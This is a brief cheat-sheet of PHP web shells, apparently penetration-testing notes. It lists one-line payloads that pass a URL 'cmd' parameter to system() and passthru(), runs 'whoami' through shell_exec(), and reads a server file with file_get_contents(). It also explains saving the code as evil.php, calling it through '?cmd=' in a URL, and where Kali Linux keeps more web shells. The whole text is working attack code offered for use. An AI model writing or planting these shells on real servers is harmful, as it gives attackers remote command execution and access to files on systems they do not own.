<<


NOTES: 

1. Save code as .php file

W1: <?php system($_GET["cmd"]); ?>
W2: <?php echo shell_exec("whoami");?>
W3: <?php echo passthru($_GET['cmd']); ?>

USAGE: http://ip_addr/evil.php?cmd=id 

*suppose the file was saved as evil.php 
  
.W1. | .W2. | .W3.

W4: <?php echo file_get_contents('/filename/text.txt'); ?>

.W4.

NOTE: W1 and W3 work exactly the same. Remember to add ?cmd= to the URL to invoke commands. Some of them can invoke
the command directly.

NOTE: Kali linux Webshells: /usr/share/webshells